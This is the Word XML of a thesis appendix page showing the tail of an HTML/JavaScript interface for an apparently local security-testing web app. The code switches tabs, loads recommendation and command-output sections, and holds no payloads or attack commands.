        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005027FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">                var parser = new DOMParser();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B47B713" w14:textId="77777777" w:rsidR="00A75083" w:rsidRPr="005027FB" w:rsidRDefault="00A75083" w:rsidP="00A75083">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1394"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005027FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">                var doc = parser.parseFromString(request.responseText, "text/html");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="794720A0" w14:textId="77777777" w:rsidR="00A75083" w:rsidRPr="005027FB" w:rsidRDefault="00A75083" w:rsidP="00A75083">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1394"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005027FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">                var elem = doc.getElementById("command_execution");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38BB9A54" w14:textId="77777777" w:rsidR="00A75083" w:rsidRPr="005027FB" w:rsidRDefault="00A75083" w:rsidP="00A75083">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1394"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005027FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">                document.getElementById("div_for_all").innerHTML = elem.innerHTML;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="101C5A44" w14:textId="77777777" w:rsidR="00A75083" w:rsidRPr="005027FB" w:rsidRDefault="00A75083" w:rsidP="00A75083">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1394"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005027FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13EB4922" w14:textId="637C9083" w:rsidR="00A75083" w:rsidRPr="005027FB" w:rsidRDefault="00A75083" w:rsidP="00A75083">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1394"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005027FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4461697B" w14:textId="77777777" w:rsidR="00A75083" w:rsidRPr="005027FB" w:rsidRDefault="00A75083" w:rsidP="00A75083">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1394"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005027FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">        document.getElementById("output_com_exec").style.visibility = "visible"; // textarea element for command execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68185C23" w14:textId="77777777" w:rsidR="00A75083" w:rsidRPr="005027FB" w:rsidRDefault="00A75083" w:rsidP="00A75083">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1394"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005027FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">        //document.getElementById("cheat_sheet_sqli").remove();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09939D5C" w14:textId="77777777" w:rsidR="00A75083" w:rsidRPr="005027FB" w:rsidRDefault="00A75083" w:rsidP="00A75083">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1394"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005027FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">      }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F088273" w14:textId="77777777" w:rsidR="00A75083" w:rsidRPr="005027FB" w:rsidRDefault="00A75083" w:rsidP="00A75083">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1394"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0481602E" w14:textId="77777777" w:rsidR="00A75083" w:rsidRPr="005027FB" w:rsidRDefault="00A75083" w:rsidP="00A75083">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1394"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7253757D" w14:textId="77777777" w:rsidR="00A75083" w:rsidRPr="005027FB" w:rsidRDefault="00A75083" w:rsidP="00A75083">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1394"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005027FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">      function recomendation_class(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06CF1FC5" w14:textId="77777777" w:rsidR="00A75083" w:rsidRPr="005027FB" w:rsidRDefault="00A75083" w:rsidP="00A75083">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1394"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005027FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">        document.getElementById("cheat_sheet").className = "";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="530276A5" w14:textId="77777777" w:rsidR="00A75083" w:rsidRPr="005027FB" w:rsidRDefault="00A75083" w:rsidP="00A75083">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1394"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005027FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">        document.getElementById("tools").className = "";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="208E8CFB" w14:textId="77777777" w:rsidR="00A75083" w:rsidRPr="005027FB" w:rsidRDefault="00A75083" w:rsidP="00A75083">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1394"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005027FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">        document.getElementById("recomendation").className = "active";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17C34863" w14:textId="77777777" w:rsidR="00A75083" w:rsidRPr="005027FB" w:rsidRDefault="00A75083" w:rsidP="00A75083">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1394"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39BCB137" w14:textId="77777777" w:rsidR="00A75083" w:rsidRPr="005027FB" w:rsidRDefault="00A75083" w:rsidP="00A75083">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1394"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005027FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">        var request = new XMLHttpRequest();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16E76E1D" w14:textId="77777777" w:rsidR="00A75083" w:rsidRPr="005027FB" w:rsidRDefault="00A75083" w:rsidP="00A75083">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1394"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005027FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">        request.open("GET", "http://127.0.0.1:8000/recommendations/", true);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47780DED" w14:textId="77777777" w:rsidR="00A75083" w:rsidRPr="005027FB" w:rsidRDefault="00A75083" w:rsidP="00A75083">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1394"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005027FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">        request.send(null);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63BB0A32" w14:textId="77777777" w:rsidR="00A75083" w:rsidRPr="005027FB" w:rsidRDefault="00A75083" w:rsidP="00A75083">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1394"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005027FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">        request.onreadystatechange = function(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19831CD9" w14:textId="77777777" w:rsidR="00A75083" w:rsidRPr="005027FB" w:rsidRDefault="00A75083" w:rsidP="00A75083">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1394"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005027FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">            if (request.readyState == 4){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55F66DE6" w14:textId="77777777" w:rsidR="00A75083" w:rsidRPr="005027FB" w:rsidRDefault="00A75083" w:rsidP="00A75083">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1394"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005027FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">                var parser = new DOMParser();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69E2EBD1" w14:textId="77777777" w:rsidR="00A75083" w:rsidRPr="005027FB" w:rsidRDefault="00A75083" w:rsidP="00A75083">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1394"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005027FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">                var doc = parser.parseFromString(request.responseText, "text/html");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="417D93E8" w14:textId="77777777" w:rsidR="00A75083" w:rsidRPr="005027FB" w:rsidRDefault="00A75083" w:rsidP="00A75083">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1394"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005027FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">                var elem = doc.getElementById("recommend");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09A0031A" w14:textId="77777777" w:rsidR="00A75083" w:rsidRPr="005027FB" w:rsidRDefault="00A75083" w:rsidP="00A75083">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1394"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005027FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">                document.getElementById("div_for_all").innerHTML = elem.innerHTML;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AA3AB6D" w14:textId="77777777" w:rsidR="00A75083" w:rsidRPr="005027FB" w:rsidRDefault="00A75083" w:rsidP="00A75083">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1394"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005027FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53F44A2A" w14:textId="77777777" w:rsidR="00A75083" w:rsidRPr="005027FB" w:rsidRDefault="00A75083" w:rsidP="00A75083">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1394"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005027FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DCE17BB" w14:textId="77777777" w:rsidR="00A75083" w:rsidRPr="005027FB" w:rsidRDefault="00A75083" w:rsidP="00A75083">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1394"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5CED1ADB" w14:textId="0F2C342E" w:rsidR="00A75083" w:rsidRPr="00A75083" w:rsidRDefault="00A75083" w:rsidP="00A75083">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1394"/>
        </w:tabs>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A75083">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Продовження додатку А</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EEC5E5E" w14:textId="77777777" w:rsidR="00A75083" w:rsidRPr="005027FB" w:rsidRDefault="00A75083" w:rsidP="00A75083">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1394"/>
        </w:tabs>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005027FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46713F0B" w14:textId="407B22A1" w:rsidR="00A75083" w:rsidRPr="005027FB" w:rsidRDefault="00A75083" w:rsidP="00A75083">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1394"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005027FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>document.getElementById("output_com_exec").style.visibility = "hidden"; // textarea element for command execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="018C683C" w14:textId="77777777" w:rsidR="00A75083" w:rsidRPr="005027FB" w:rsidRDefault="00A75083" w:rsidP="00A75083">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1394"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005027FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">      }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0287741B" w14:textId="77777777" w:rsidR="00A75083" w:rsidRPr="005027FB" w:rsidRDefault="00A75083" w:rsidP="00A75083">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1394"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="217DED07" w14:textId="77777777" w:rsidR="00A75083" w:rsidRPr="005027FB" w:rsidRDefault="00A75083" w:rsidP="00A75083">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1394"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005027FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76FAF3E0" w14:textId="77777777" w:rsidR="00A75083" w:rsidRPr="005027FB" w:rsidRDefault="00A75083" w:rsidP="00A75083">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1394"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="146AD120" w14:textId="77777777" w:rsidR="00A75083" w:rsidRPr="005027FB" w:rsidRDefault="00A75083" w:rsidP="00A75083">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1394"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005027FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;!-- &lt;div class="SQLi_div" id="cm_exec_div"&gt;&lt;h2&gt; {{ com_exec }} &lt;/h2&gt;&lt;/div&gt;  --&gt; &lt;!-- coomand execution div --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60E57457" w14:textId="77777777" w:rsidR="00A75083" w:rsidRPr="005027FB" w:rsidRDefault="00A75083" w:rsidP="00A75083">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1394"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005027FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">   &lt;textarea id="output_com_exec" readonly&gt; {{ com_exec }} &lt;/textarea&gt;  &lt;!-- coomand execution textarea --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DAD24E4" w14:textId="77777777" w:rsidR="00A75083" w:rsidRPr="005027FB" w:rsidRDefault="00A75083" w:rsidP="00A75083">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1394"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="566D1F43" w14:textId="77777777" w:rsidR="00A75083" w:rsidRPr="00A75083" w:rsidRDefault="00A75083" w:rsidP="00A75083">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1394"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005027FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00A75083">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>&lt;/body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="276FFEF3" w14:textId="33551E6A" w:rsidR="007679D8" w:rsidRPr="00A75083" w:rsidRDefault="00A75083" w:rsidP="00A75083">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1394"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A75083">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>&lt;/html&gt;</w:t>
      </w:r>
      <w:r w:rsidR="007679D8" w:rsidRPr="00A75083">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="007679D8" w:rsidRPr="00A75083" w:rsidSect="00B43131">
      <w:headerReference w:type="default" r:id="rId46"/>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930A6D" w14:textId="77777777" w:rsidR="006F5970" w:rsidRDefault="006F5970" w:rsidP="00BF1B1F">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="256AA234" w14:textId="77777777" w:rsidR="006F5970" w:rsidRDefault="006F5970" w:rsidP="00BF1B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1"/>
    <w:family w:val="auto"/>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FreeSans">
    <w:altName w:val="Times New Roman"/>
    <w:charset w:val="01"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="variable"/>
    <w:sig w:usb0="000000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 w:name="DejaVu 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E317D9" w14:textId="77777777" w:rsidR="006F5970" w:rsidRDefault="006F5970" w:rsidP="00BF1B1F">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="2F6F8D16" w14:textId="77777777" w:rsidR="006F5970" w:rsidRDefault="006F5970" w:rsidP="00BF1B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0749065"/>
      <w:docPartObj>
        <w:docPartGallery w:val="Page Numbers (Top of Page)"/>
        <w:docPartUnique/>
      </w:docPartObj>
    </w:sdtPr>
    <w:sdtEndPr/>
    <w:sdtContent>
      <w:p w14:paraId="1532FB9D" w14:textId="66DF4561" w:rsidR="0001493A" w:rsidRDefault="0001493A">
        <w:pPr>
          <w:pStyle w:val="a4"/>
          <w:jc w:val="right"/>
        </w:pPr>
        <w:r>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:instrText>PAGE   \* MERGEFORMAT</w:instrText>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00C86D02" w:rsidRPr="00C86D02">
          <w:rPr>
            <w:noProof/>
            <w:lang w:val="uk-UA"/>
          </w:rPr>
          <w:t>2</w:t>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:p>
    </w:sdtContent>
  </w:sdt>
  <w:p w14:paraId="527D0B09" w14:textId="77777777" w:rsidR="00FF6E1E" w:rsidRDefault="00FF6E1E">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6728555"/>
      <w:docPartObj>
        <w:docPartGallery w:val="Page Numbers (Top of Page)"/>
        <w:docPartUnique/>
      </w:docPartObj>
    </w:sdtPr>
    <w:sdtEndPr/>
    <w:sdtContent>
      <w:p w14:paraId="6D823313" w14:textId="720F1BCC" w:rsidR="00FF6E1E" w:rsidRDefault="00FF6E1E">
        <w:pPr>
          <w:pStyle w:val="a4"/>
          <w:jc w:val="right"/>
        </w:pPr>
        <w:r>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:instrText>PAGE   \* MERGEFORMAT</w:instrText>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:lang w:val="uk-UA"/>
          </w:rPr>
          <w:t>2</w:t>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:p>
    </w:sdtContent>
  </w:sdt>
  <w:p w14:paraId="1535B314" w14:textId="77777777" w:rsidR="00FF6E1E" w:rsidRDefault="00FF6E1E">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EFECFA66"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="6"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="927"/>
        </w:tabs>
        <w:ind w:left="927" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:b w:val="0"/>
        <w:bCs/>
        <w:sz w:val="28"/>
        <w:szCs w:val="28"/>
        <w:lang w:val="uk-UA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
